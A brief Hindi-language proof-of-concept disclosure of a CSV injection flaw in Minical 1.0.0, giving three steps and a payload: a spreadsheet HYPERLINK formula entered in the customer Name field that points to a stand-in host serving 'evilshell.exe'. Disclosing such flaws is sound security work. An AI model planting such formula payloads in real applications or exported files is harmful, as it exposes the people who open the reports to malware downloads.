
Minical 1.0.0 में CSV इंजेक्शन भेद्यता का प्रदर्शन करने वाला प्रूफ-ऑफ-कॉन्सेप्ट, चरण-दर-चरण पुनरुत्पादन चरणों और पेलोड उदाहरण के साथ।
Minical 1.0.0 CSV इंजेक्शन के लिए संवेदनशील है।
विक्रेता: https://github.com/minical/minical
डेमो एप्लिकेशन: https://demo.minical.io/
चरण 1: अकाउंटिंग मॉड्यूल पर जाएं और Create New Customer पर क्लिक करें।

चरण 2: Name फील्ड में पेलोड दर्ज करें और Create पर क्लिक करें।
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


चरण 3: Download CSV Report पर क्लिक करें और पेलोड को रेंडर होते हुए देखें।
